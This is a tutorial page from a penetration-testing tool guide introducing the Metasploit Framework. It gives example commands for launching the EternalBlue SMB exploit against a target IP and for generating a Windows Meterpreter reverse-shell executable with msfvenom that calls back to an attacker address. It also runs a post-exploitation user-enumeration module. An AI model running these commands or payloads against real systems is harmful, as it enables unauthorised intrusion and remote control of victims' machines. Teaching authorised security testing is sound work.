Home » Tools » 6. Exploitation Tools » 1. Metasploit Framework

1. Metasploit Framework

Description:
The Metasploit Framework is one of the most popular tools for exploitation. It includes a large number of exploits, payloads, auxiliary modules, and post-exploitation tools. Metasploit is highly extensible and can be used for tasks such as vulnerability scanning, exploitation, privilege escalation, and maintaining access.

Components of Metasploit:

      • msfconsole: The command-line interface for interacting with Metasploit, allowing users to execute commands, search exploits, and launch attacks.
      • msfvenom: A tool for generating payloads that can be used with exploits.
      • Exploit Modules: Modules used to exploit specific vulnerabilities.
      • Payloads: Code executed after the exploit succeeds. Payloads can provide shells, Meterpreter sessions, or execute other specific actions.
      • Post Modules: Used after exploitation to maintain access, gather information, escalate privileges, or clean up.

Examples:

  1. Start Metasploit Console:
      • msfconsole

Explanation: Launches the msfconsole command-line interface, the primary way of interacting with the Metasploit Framework.

  1. Search for an Exploit:
      • search exploit smb

Explanation: Searches for exploit modules related to SMB (Server Message Block) vulnerabilities.

  1. Select and Configure an Exploit:
      • use exploit/windows/smb/ms17_010_eternalblue
      • set RHOST 192.168.1.10
      • set LHOST 192.168.1.5
      • exploit

Explanation: Uses the EternalBlue exploit against the target host (RHOST) and sets the attacker’s IP (LHOST). Finally, the exploit command is used to execute the exploit.

  1. Generate a Payload using msfvenom:
      • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > payload.exe

Explanation: Generates a reverse Meterpreter payload (windows/meterpreter/reverse_tcp) that connects back to the attacker’s IP (LHOST) and saves it as an executable file.

  1. Post-Exploitation Example:
      • use post/windows/gather/enum_logged_on_users
      • set SESSION 1
      • run

Explanation: Runs a post-exploitation module to enumerate logged-in users on a compromised Windows target. The session ID (SESSION) is specified to target the compromised system.

Scroll to Top